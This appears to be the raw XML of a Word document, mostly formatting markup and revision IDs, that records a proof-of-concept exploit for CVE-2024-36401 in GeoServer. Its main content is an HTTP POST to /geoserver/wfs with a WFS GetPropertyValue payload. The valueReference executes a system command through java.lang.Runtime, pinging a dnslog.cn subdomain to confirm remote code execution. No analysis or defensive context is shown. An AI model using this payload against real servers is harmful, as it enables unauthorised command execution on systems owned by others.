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9FB19">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="宋体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CVE-2024-36401</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CD9F0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1E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862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/geoserver/wfs HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29E301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Host: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50C70C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x64; rv:109.0) Gecko/20100101 Firefox/110.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32715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*/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="070E1B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application/xml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7846D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2185</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59171B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  <w:p w14:paraId="21A810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&lt;wfs:GetPropertyValue service='WFS' version='2.0.0'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AAAE5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xmlns:topp='http://www.openplans.org/topp'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="018C41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xmlns:fes='http://www.opengis.net/fes/2.0'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="678EC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xmlns:wfs='http://www.opengis.net/wfs/2.0'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CA0E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valueReference='exec(java.lang.Runtime.getRuntime(),"ping </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>xxxx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>.dnslog.cn")'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="132169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&lt;wfs:Query typeNames='topp:states'/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FE3BF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&lt;/wfs:GetPropertyValue&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A57E0E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519F36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DA4AE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1524"/>
    <w:rsid w:val="046034E3"/>
    <w:rsid w:val="0E6B247B"/>
    <w:rsid w:val="0FF7FEA5"/>
    <w:rsid w:val="139F8276"/>
    <w:rsid w:val="13DFAD20"/>
    <w:rsid w:val="1785A926"/>
    <w:rsid w:val="17E55D5F"/>
    <w:rsid w:val="1AE224E8"/>
    <w:rsid w:val="1B97CA72"/>
    <w:rsid w:val="1DEF72F8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DFF6996"/>
    <w:rsid w:val="2EFF020B"/>
    <w:rsid w:val="2FBFBFFB"/>
    <w:rsid w:val="2FDF3766"/>
    <w:rsid w:val="2FFF4B20"/>
    <w:rsid w:val="37D79716"/>
    <w:rsid w:val="37EE8CD9"/>
    <w:rsid w:val="37FF2A93"/>
    <w:rsid w:val="37FF9796"/>
    <w:rsid w:val="3AB73EF0"/>
    <w:rsid w:val="3BDFC0B7"/>
    <w:rsid w:val="3C93886E"/>
    <w:rsid w:val="3CEF9AF8"/>
    <w:rsid w:val="3D59B483"/>
    <w:rsid w:val="3D79E67D"/>
    <w:rsid w:val="3DEF86D1"/>
    <w:rsid w:val="3DFF81FD"/>
    <w:rsid w:val="3EB31C8B"/>
    <w:rsid w:val="3EBF53D2"/>
    <w:rsid w:val="3EFC37B8"/>
    <w:rsid w:val="3EFFD843"/>
    <w:rsid w:val="3F9FCC79"/>
    <w:rsid w:val="3FAFB21B"/>
    <w:rsid w:val="3FBFCB8B"/>
    <w:rsid w:val="3FCF7719"/>
    <w:rsid w:val="3FDEA6AA"/>
    <w:rsid w:val="3FEB3B3D"/>
    <w:rsid w:val="3FF80E9F"/>
    <w:rsid w:val="3FFCDE76"/>
    <w:rsid w:val="41BAF9B9"/>
    <w:rsid w:val="42FD4AE6"/>
    <w:rsid w:val="436B631A"/>
    <w:rsid w:val="49E73956"/>
    <w:rsid w:val="4CAE50B6"/>
    <w:rsid w:val="4F4E1CE2"/>
    <w:rsid w:val="4FDCCC2A"/>
    <w:rsid w:val="4FF7A29A"/>
    <w:rsid w:val="4FFB5482"/>
    <w:rsid w:val="4FFDEB6D"/>
    <w:rsid w:val="4FFF9275"/>
    <w:rsid w:val="524E74B2"/>
    <w:rsid w:val="53756882"/>
    <w:rsid w:val="53DF6C93"/>
    <w:rsid w:val="53E3D198"/>
    <w:rsid w:val="54FD31BC"/>
    <w:rsid w:val="55BF7986"/>
    <w:rsid w:val="55EBD72F"/>
    <w:rsid w:val="57771623"/>
    <w:rsid w:val="577BEC18"/>
    <w:rsid w:val="57FD1524"/>
    <w:rsid w:val="58793F0B"/>
    <w:rsid w:val="5AFD7C30"/>
    <w:rsid w:val="5B6E52F5"/>
    <w:rsid w:val="5BCDD2E7"/>
    <w:rsid w:val="5BD71659"/>
    <w:rsid w:val="5BD77C15"/>
    <w:rsid w:val="5BFD9482"/>
    <w:rsid w:val="5D7B3FBC"/>
    <w:rsid w:val="5DB754A9"/>
    <w:rsid w:val="5DFB9FF8"/>
    <w:rsid w:val="5DFCAAEF"/>
    <w:rsid w:val="5E7AA2DB"/>
    <w:rsid w:val="5EDB9C38"/>
    <w:rsid w:val="5EEB849B"/>
    <w:rsid w:val="5EFD149D"/>
    <w:rsid w:val="5EFFD044"/>
    <w:rsid w:val="5F7A13AB"/>
    <w:rsid w:val="5F7F0FB8"/>
    <w:rsid w:val="5F8F3A28"/>
    <w:rsid w:val="5F9327FD"/>
    <w:rsid w:val="5FBF167B"/>
    <w:rsid w:val="5FBF862A"/>
    <w:rsid w:val="5FED12B8"/>
    <w:rsid w:val="5FEF6745"/>
    <w:rsid w:val="5FF1F784"/>
    <w:rsid w:val="5FF3E307"/>
    <w:rsid w:val="60238493"/>
    <w:rsid w:val="617F880E"/>
    <w:rsid w:val="63DBC652"/>
    <w:rsid w:val="65FF423B"/>
    <w:rsid w:val="6690A103"/>
    <w:rsid w:val="66E7DF82"/>
    <w:rsid w:val="67E7CB12"/>
    <w:rsid w:val="67FF23E7"/>
    <w:rsid w:val="67FFF15E"/>
    <w:rsid w:val="684F53CA"/>
    <w:rsid w:val="69FF35FC"/>
    <w:rsid w:val="6AA7111C"/>
    <w:rsid w:val="6BBB4FAF"/>
    <w:rsid w:val="6BCDD5AF"/>
    <w:rsid w:val="6BDF1674"/>
    <w:rsid w:val="6BF3A92F"/>
    <w:rsid w:val="6C6FD6D8"/>
    <w:rsid w:val="6D3CEABA"/>
    <w:rsid w:val="6D79BAE5"/>
    <w:rsid w:val="6D7E2FFF"/>
    <w:rsid w:val="6DB22A8C"/>
    <w:rsid w:val="6EBBFE9E"/>
    <w:rsid w:val="6EF70D5B"/>
    <w:rsid w:val="6EFB71B1"/>
    <w:rsid w:val="6EFE788C"/>
    <w:rsid w:val="6F6F2774"/>
    <w:rsid w:val="6F9F8AB1"/>
    <w:rsid w:val="6FB1785A"/>
    <w:rsid w:val="6FBD5535"/>
    <w:rsid w:val="6FBD7CF2"/>
    <w:rsid w:val="6FDAD8C7"/>
    <w:rsid w:val="6FE75C91"/>
    <w:rsid w:val="6FEE5854"/>
    <w:rsid w:val="6FFCCC47"/>
    <w:rsid w:val="70B63205"/>
    <w:rsid w:val="72CFED86"/>
    <w:rsid w:val="72EFF6DD"/>
    <w:rsid w:val="73A9F55B"/>
    <w:rsid w:val="73C94D1C"/>
    <w:rsid w:val="73CBABE1"/>
    <w:rsid w:val="73DF1153"/>
    <w:rsid w:val="73FD6563"/>
    <w:rsid w:val="755FB177"/>
    <w:rsid w:val="75FBB840"/>
    <w:rsid w:val="75FDE963"/>
    <w:rsid w:val="76B7DBBC"/>
    <w:rsid w:val="76BF7AB2"/>
    <w:rsid w:val="76C18528"/>
    <w:rsid w:val="76EB1E07"/>
    <w:rsid w:val="77E42D04"/>
    <w:rsid w:val="77F3D40B"/>
    <w:rsid w:val="77FB1747"/>
    <w:rsid w:val="77FB6E6E"/>
    <w:rsid w:val="77FFB826"/>
    <w:rsid w:val="77FFE35A"/>
    <w:rsid w:val="785F0ADD"/>
    <w:rsid w:val="7956CD3D"/>
    <w:rsid w:val="79DB5D14"/>
    <w:rsid w:val="79FFF76A"/>
    <w:rsid w:val="7A3FEC00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BE3E70"/>
    <w:rsid w:val="7BD7F576"/>
    <w:rsid w:val="7BDE81B7"/>
    <w:rsid w:val="7BF7E1F0"/>
    <w:rsid w:val="7BF7ECA9"/>
    <w:rsid w:val="7BFF263C"/>
    <w:rsid w:val="7BFF60DD"/>
    <w:rsid w:val="7CD5C5D6"/>
    <w:rsid w:val="7CF6A534"/>
    <w:rsid w:val="7CF7A1BC"/>
    <w:rsid w:val="7D39CCA9"/>
    <w:rsid w:val="7D3E8510"/>
    <w:rsid w:val="7D7FDF5C"/>
    <w:rsid w:val="7DBFF484"/>
    <w:rsid w:val="7DFDA978"/>
    <w:rsid w:val="7DFF6791"/>
    <w:rsid w:val="7DFF7665"/>
    <w:rsid w:val="7DFFA47E"/>
    <w:rsid w:val="7E6E81D2"/>
    <w:rsid w:val="7E78C45A"/>
    <w:rsid w:val="7E7BCD1C"/>
    <w:rsid w:val="7E7E60FB"/>
    <w:rsid w:val="7E7F0454"/>
    <w:rsid w:val="7E9F6F51"/>
    <w:rsid w:val="7EAE9A02"/>
    <w:rsid w:val="7EBDF6C6"/>
    <w:rsid w:val="7EBF3036"/>
    <w:rsid w:val="7EDEA4A4"/>
    <w:rsid w:val="7EEE5429"/>
    <w:rsid w:val="7EEF2911"/>
    <w:rsid w:val="7EFC1F47"/>
    <w:rsid w:val="7EFC2D9C"/>
    <w:rsid w:val="7EFDDE9E"/>
    <w:rsid w:val="7EFE0F05"/>
    <w:rsid w:val="7F26BCBA"/>
    <w:rsid w:val="7F376BCC"/>
    <w:rsid w:val="7F3E08FE"/>
    <w:rsid w:val="7F3F55B7"/>
    <w:rsid w:val="7F6F3B96"/>
    <w:rsid w:val="7F765816"/>
    <w:rsid w:val="7F7F951F"/>
    <w:rsid w:val="7FAFBBCC"/>
    <w:rsid w:val="7FB00F60"/>
    <w:rsid w:val="7FB3A4A5"/>
    <w:rsid w:val="7FB7D77D"/>
    <w:rsid w:val="7FBB719F"/>
    <w:rsid w:val="7FBD0F50"/>
    <w:rsid w:val="7FBEA1CB"/>
    <w:rsid w:val="7FBEF506"/>
    <w:rsid w:val="7FBF1F4D"/>
    <w:rsid w:val="7FBF463C"/>
    <w:rsid w:val="7FCC0259"/>
    <w:rsid w:val="7FCE339B"/>
    <w:rsid w:val="7FD73586"/>
    <w:rsid w:val="7FD736C9"/>
    <w:rsid w:val="7FD7BF36"/>
    <w:rsid w:val="7FDB36B4"/>
    <w:rsid w:val="7FDB6353"/>
    <w:rsid w:val="7FDF2293"/>
    <w:rsid w:val="7FDF396C"/>
    <w:rsid w:val="7FE69C24"/>
    <w:rsid w:val="7FE76ACB"/>
    <w:rsid w:val="7FED6077"/>
    <w:rsid w:val="7FED80C6"/>
    <w:rsid w:val="7FEFB010"/>
    <w:rsid w:val="7FEFB24F"/>
    <w:rsid w:val="7FF2849D"/>
    <w:rsid w:val="7FF378FD"/>
    <w:rsid w:val="7FF52585"/>
    <w:rsid w:val="7FF978FA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DDFC9D4"/>
    <w:rsid w:val="9E472BEC"/>
    <w:rsid w:val="9EA1E5E3"/>
    <w:rsid w:val="9F3DDE07"/>
    <w:rsid w:val="9F7CD18D"/>
    <w:rsid w:val="9F9720AE"/>
    <w:rsid w:val="9FAF2B7F"/>
    <w:rsid w:val="9FDAB30B"/>
    <w:rsid w:val="9FE6C6CC"/>
    <w:rsid w:val="9FF571A7"/>
    <w:rsid w:val="9FFDAEBF"/>
    <w:rsid w:val="9FFF3431"/>
    <w:rsid w:val="A1FD5A70"/>
    <w:rsid w:val="A27E69B0"/>
    <w:rsid w:val="A3D3B5AD"/>
    <w:rsid w:val="A6FDCE76"/>
    <w:rsid w:val="A8FB678E"/>
    <w:rsid w:val="AD5B8CAC"/>
    <w:rsid w:val="ADF7E1D9"/>
    <w:rsid w:val="ADFFA875"/>
    <w:rsid w:val="AEFED516"/>
    <w:rsid w:val="AF47AD03"/>
    <w:rsid w:val="AFAE14B9"/>
    <w:rsid w:val="AFB6F41D"/>
    <w:rsid w:val="B0974690"/>
    <w:rsid w:val="B47F41C3"/>
    <w:rsid w:val="B53FB2C1"/>
    <w:rsid w:val="B6FE24EA"/>
    <w:rsid w:val="B6FFBFA8"/>
    <w:rsid w:val="B73E3741"/>
    <w:rsid w:val="B77E1D1E"/>
    <w:rsid w:val="B7FF178E"/>
    <w:rsid w:val="B96C5A42"/>
    <w:rsid w:val="BB6E64CC"/>
    <w:rsid w:val="BDEE8467"/>
    <w:rsid w:val="BDFE9AA0"/>
    <w:rsid w:val="BDFF03F8"/>
    <w:rsid w:val="BDFF1BC3"/>
    <w:rsid w:val="BDFF3D9F"/>
    <w:rsid w:val="BE77A9F7"/>
    <w:rsid w:val="BEFF1E42"/>
    <w:rsid w:val="BF5D1E32"/>
    <w:rsid w:val="BF6E9E5C"/>
    <w:rsid w:val="BF79AA45"/>
    <w:rsid w:val="BFB37021"/>
    <w:rsid w:val="BFF7428B"/>
    <w:rsid w:val="BFFBDEDA"/>
    <w:rsid w:val="BFFEEB34"/>
    <w:rsid w:val="BFFFD0DE"/>
    <w:rsid w:val="BFFFFF57"/>
    <w:rsid w:val="C35F894E"/>
    <w:rsid w:val="C3FE21AB"/>
    <w:rsid w:val="C725C9FC"/>
    <w:rsid w:val="C7F756EF"/>
    <w:rsid w:val="C8FA74BF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5F6A510"/>
    <w:rsid w:val="D733C1C9"/>
    <w:rsid w:val="D7344563"/>
    <w:rsid w:val="D7B732F6"/>
    <w:rsid w:val="D8BF77E5"/>
    <w:rsid w:val="D9AD4A21"/>
    <w:rsid w:val="D9BBCE23"/>
    <w:rsid w:val="DB7F9EF3"/>
    <w:rsid w:val="DBA4F869"/>
    <w:rsid w:val="DD7D3824"/>
    <w:rsid w:val="DDC8EC84"/>
    <w:rsid w:val="DDDFE8FB"/>
    <w:rsid w:val="DDF07563"/>
    <w:rsid w:val="DE7FDD73"/>
    <w:rsid w:val="DEEF8A8F"/>
    <w:rsid w:val="DEF9DEED"/>
    <w:rsid w:val="DFCF9D82"/>
    <w:rsid w:val="DFF54C4B"/>
    <w:rsid w:val="DFF63828"/>
    <w:rsid w:val="DFFF08E0"/>
    <w:rsid w:val="DFFF885E"/>
    <w:rsid w:val="DFFFC62C"/>
    <w:rsid w:val="E2DF4477"/>
    <w:rsid w:val="E3F781F7"/>
    <w:rsid w:val="E59FF217"/>
    <w:rsid w:val="E77B0D1F"/>
    <w:rsid w:val="E79B4105"/>
    <w:rsid w:val="E7FA619A"/>
    <w:rsid w:val="E8DB0D5F"/>
    <w:rsid w:val="E9ED6298"/>
    <w:rsid w:val="E9FA37F4"/>
    <w:rsid w:val="EB3FABDA"/>
    <w:rsid w:val="EB9F36C9"/>
    <w:rsid w:val="EBF91784"/>
    <w:rsid w:val="EBFFAE11"/>
    <w:rsid w:val="ECB7AB14"/>
    <w:rsid w:val="ECFE5741"/>
    <w:rsid w:val="EDBFE5F3"/>
    <w:rsid w:val="EDDC3FE8"/>
    <w:rsid w:val="EDFDCC92"/>
    <w:rsid w:val="EE2FBC8B"/>
    <w:rsid w:val="EE3F6450"/>
    <w:rsid w:val="EF5EEC38"/>
    <w:rsid w:val="EF73962F"/>
    <w:rsid w:val="EF7D3A8B"/>
    <w:rsid w:val="EFAEA687"/>
    <w:rsid w:val="EFF9367F"/>
    <w:rsid w:val="EFFAC8C3"/>
    <w:rsid w:val="EFFD715E"/>
    <w:rsid w:val="EFFF8005"/>
    <w:rsid w:val="EFFFA52C"/>
    <w:rsid w:val="EFFFAB75"/>
    <w:rsid w:val="F06FBB40"/>
    <w:rsid w:val="F0FAAA88"/>
    <w:rsid w:val="F17F4293"/>
    <w:rsid w:val="F1E59709"/>
    <w:rsid w:val="F1F597D0"/>
    <w:rsid w:val="F1FDE6F5"/>
    <w:rsid w:val="F1FF2A92"/>
    <w:rsid w:val="F23C9380"/>
    <w:rsid w:val="F27D5C03"/>
    <w:rsid w:val="F27FCA1F"/>
    <w:rsid w:val="F297FCDB"/>
    <w:rsid w:val="F37A2CDD"/>
    <w:rsid w:val="F3BF0145"/>
    <w:rsid w:val="F3FBB573"/>
    <w:rsid w:val="F4B7A44D"/>
    <w:rsid w:val="F57112A3"/>
    <w:rsid w:val="F5AB2C7D"/>
    <w:rsid w:val="F5B36BE9"/>
    <w:rsid w:val="F5BF77B4"/>
    <w:rsid w:val="F5F72DF8"/>
    <w:rsid w:val="F5FB05C8"/>
    <w:rsid w:val="F6273DA8"/>
    <w:rsid w:val="F6690D7E"/>
    <w:rsid w:val="F6B45A3A"/>
    <w:rsid w:val="F6FBF995"/>
    <w:rsid w:val="F75C4D1C"/>
    <w:rsid w:val="F76B3DD1"/>
    <w:rsid w:val="F7778859"/>
    <w:rsid w:val="F77FFC25"/>
    <w:rsid w:val="F79E8BA0"/>
    <w:rsid w:val="F7D95AD9"/>
    <w:rsid w:val="F7DB388E"/>
    <w:rsid w:val="F7E28B87"/>
    <w:rsid w:val="F7F5C8C0"/>
    <w:rsid w:val="F7F77DA1"/>
    <w:rsid w:val="F7FF6A77"/>
    <w:rsid w:val="F8BF8985"/>
    <w:rsid w:val="F8CF5F7F"/>
    <w:rsid w:val="F8FF6356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AFF354A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6BD402"/>
    <w:rsid w:val="FE720051"/>
    <w:rsid w:val="FE7B1328"/>
    <w:rsid w:val="FE999DCC"/>
    <w:rsid w:val="FE9BFA22"/>
    <w:rsid w:val="FEDE071F"/>
    <w:rsid w:val="FEDEF66D"/>
    <w:rsid w:val="FEEBBCF6"/>
    <w:rsid w:val="FEEE9977"/>
    <w:rsid w:val="FEF27B8B"/>
    <w:rsid w:val="FEF67505"/>
    <w:rsid w:val="FEFA3455"/>
    <w:rsid w:val="FEFC3A5C"/>
    <w:rsid w:val="FEFC4869"/>
    <w:rsid w:val="FEFC9411"/>
    <w:rsid w:val="FF4FFC4C"/>
    <w:rsid w:val="FF5DA5AC"/>
    <w:rsid w:val="FF679AA1"/>
    <w:rsid w:val="FF6D89C7"/>
    <w:rsid w:val="FF7BC27C"/>
    <w:rsid w:val="FF7CA208"/>
    <w:rsid w:val="FF7FA203"/>
    <w:rsid w:val="FFAF2C31"/>
    <w:rsid w:val="FFBC1160"/>
    <w:rsid w:val="FFBCCD69"/>
    <w:rsid w:val="FFBD17F5"/>
    <w:rsid w:val="FFBDD75C"/>
    <w:rsid w:val="FFBF6EF2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11EE3"/>
    <w:rsid w:val="FFF3FA3D"/>
    <w:rsid w:val="FFF7BF3C"/>
    <w:rsid w:val="FFF9B26C"/>
    <w:rsid w:val="FFFAB5D2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493</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>518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2024-04-06T16:56:00Z</dcterms:created>
  <dc:creator>路边菜贩子</dc:creator>
  <cp:lastModifiedBy>a.    风华如故</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-03T05:36:25Z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A47377A4C94B4D42833A3C95526802A1_13</vt:lpwstr>
  </property>
</Properties>
</file>